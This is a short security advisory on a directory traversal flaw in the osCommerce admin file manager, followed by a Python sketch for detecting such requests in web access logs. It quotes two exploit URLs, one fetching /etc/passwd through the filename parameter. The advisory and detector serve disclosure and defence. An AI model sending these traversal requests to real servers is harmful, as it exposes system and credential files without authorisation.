osCommerce File Manager Directory Traversal Vulnerability

No exploit is required, but Rene <l0om@excluded.org> suggested that an appropriate request to exploit this vulnerability could be:

file_manager.php?action=download&filename=../../../../../../etc/passwd

An additional exploit was provided by Megasky <magasky@hotmail.com>:

/admin/file_manager.php?action=read&filename=../../../../
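
Requests of this shape can be found in web server access logs. The following detection sketch is an added example, not part of the original advisory: it flags file_manager.php requests whose filename parameter, once decoded and normalized, resolves outside the base directory. The log lines, client addresses and function names are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /admin/file_manager.php?action=download&filename=../../../../../../etc/passwd HTTP/1.1" 200 1543',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /admin/file_manager.php?action=read&filename=..%2F..%2F..%2F..%2F HTTP/1.1" 200 812',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /admin/file_manager.php?action=read&filename=includes/header.php HTTP/1.1" 200 2290',
    '192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?filename=../x HTTP/1.1" 200 100',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def escapes_base(filename):
    """True if the value, once decoded and normalized, leaves the base directory."""
    # Decode repeatedly so double-encoded sequences (%252e%252e%252f) are caught too.
    for _ in range(3):
        decoded = unquote(filename)
        if decoded == filename:
            break
        filename = decoded
    filename = filename.replace("\\", "/")
    # Absolute paths and embedded NUL bytes are never legitimate here.
    if "\x00" in filename or filename.startswith("/"):
        return True
    normalized = posixpath.normpath(filename)
    return normalized == ".." or normalized.startswith("../")

def find_traversal(lines):
    """Return (client, filename) for file_manager.php requests whose filename escapes."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/file_manager.php"):
            continue
        # parse_qs performs the first round of URL decoding on each value.
        for value in parse_qs(url.query).get("filename", []):
            if escapes_base(value):
                hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for client, value in find_traversal(SAMPLE_LOG):
        print(client, value)
```

Normalizing before matching avoids flagging paths such as a/../b that stay inside the base directory while still catching encoded variants.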

Copyright 2010, SecurityFocus